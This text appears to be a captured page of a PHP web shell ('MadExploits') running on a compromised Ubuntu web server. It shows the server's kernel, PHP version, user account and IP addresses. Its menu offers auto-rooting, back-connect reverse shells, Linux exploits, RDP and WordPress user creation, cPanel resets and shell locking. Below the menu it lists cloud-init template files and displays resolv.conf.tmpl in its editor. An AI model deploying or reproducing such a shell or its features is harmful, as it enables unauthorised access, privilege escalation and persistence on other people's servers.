Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core20 /
2599 /
etc /
cloud /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
chef_client.rb.tmpl
1.63
KB
-rw-r--r--
chrony.conf.almalinux.tmpl
1.25
KB
-rw-r--r--
chrony.conf.alpine.tmpl
1.18
KB
-rw-r--r--
chrony.conf.centos.tmpl
1.25
KB
-rw-r--r--
chrony.conf.cloudlinux.tmpl
1.25
KB
-rw-r--r--
chrony.conf.cos.tmpl
873
B
-rw-r--r--
chrony.conf.debian.tmpl
1.18
KB
-rw-r--r--
chrony.conf.fedora.tmpl
1.34
KB
-rw-r--r--
chrony.conf.freebsd.tmpl
13.98
KB
-rw-r--r--
chrony.conf.opensuse-leap.tmpl
1.06
KB
-rw-r--r--
chrony.conf.opensuse-microos.t...
1.06
KB
-rw-r--r--
chrony.conf.opensuse-tumblewee...
1.06
KB
-rw-r--r--
chrony.conf.opensuse.tmpl
1.06
KB
-rw-r--r--
chrony.conf.photon.tmpl
1.34
KB
-rw-r--r--
chrony.conf.rhel.tmpl
1.25
KB
-rw-r--r--
chrony.conf.rocky.tmpl
1.25
KB
-rw-r--r--
chrony.conf.sle-micro.tmpl
1.06
KB
-rw-r--r--
chrony.conf.sle_hpc.tmpl
1.06
KB
-rw-r--r--
chrony.conf.sles.tmpl
1.06
KB
-rw-r--r--
chrony.conf.ubuntu.tmpl
1.35
KB
-rw-r--r--
hosts.alpine.tmpl
893
B
-rw-r--r--
hosts.aosc.tmpl
931
B
-rw-r--r--
hosts.arch.tmpl
841
B
-rw-r--r--
hosts.azurelinux.tmpl
882
B
-rw-r--r--
hosts.debian.tmpl
845
B
-rw-r--r--
hosts.freebsd.tmpl
911
B
-rw-r--r--
hosts.gentoo.tmpl
910
B
-rw-r--r--
hosts.mariner.tmpl
876
B
-rw-r--r--
hosts.photon.tmpl
874
B
-rw-r--r--
hosts.redhat.tmpl
912
B
-rw-r--r--
hosts.suse.tmpl
1.04
KB
-rw-r--r--
ntp.conf.almalinux.tmpl
1.86
KB
-rw-r--r--
ntp.conf.alpine.tmpl
255
B
-rw-r--r--
ntp.conf.cloudlinux.tmpl
1.86
KB
-rw-r--r--
ntp.conf.debian.tmpl
2.15
KB
-rw-r--r--
ntp.conf.fedora.tmpl
2.08
KB
-rw-r--r--
ntp.conf.freebsd.tmpl
4.13
KB
-rw-r--r--
ntp.conf.opensuse.tmpl
2.74
KB
-rw-r--r--
ntp.conf.photon.tmpl
1.86
KB
-rw-r--r--
ntp.conf.rhel.tmpl
1.86
KB
-rw-r--r--
ntp.conf.rocky.tmpl
1.86
KB
-rw-r--r--
ntp.conf.sles.tmpl
2.74
KB
-rw-r--r--
ntp.conf.ubuntu.tmpl
2.5
KB
-rw-r--r--
ntpd.conf.openbsd.tmpl
543
B
-rw-r--r--
resolv.conf.tmpl
921
B
-rw-r--r--
sources.list.debian.deb822.tmp...
1.42
KB
-rw-r--r--
sources.list.debian.tmpl
1.41
KB
-rw-r--r--
sources.list.ubuntu.deb822.tmp...
2.92
KB
-rw-r--r--
sources.list.ubuntu.tmpl
2.79
KB
-rw-r--r--
systemd.resolved.conf.tmpl
504
B
-rw-r--r--
timesyncd.conf.tmpl
203
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resolv.conf.tmpl
## template:jinja # Your system has been configured with 'manage-resolv-conf' set to true. # As a result, cloud-init has written this file with configuration data # that it has been provided. Cloud-init, by default, will write this file # a single time (PER_ONCE). # {% if nameservers is defined %} {% for server in nameservers %} nameserver {{server}} {% endfor %} {% endif -%} {% if searchdomains is defined %} search {% for search in searchdomains %}{{search}} {% endfor %} {% endif %} {% if domain is defined %} domain {{domain}} {% endif %} {% if sortlist is defined %} sortlist {% for sort in sortlist %}{{sort}} {% endfor %} {% endif %} {# Flags and options are required to be on the same line preceded by "options" keyword #} {% if options or flags %} options {%- for flag in flags %} {{flag-}} {% endfor %} {%- for key, value in options.items()|sort %} {{key}}:{{value-}} {% endfor %} {% endif %}
Close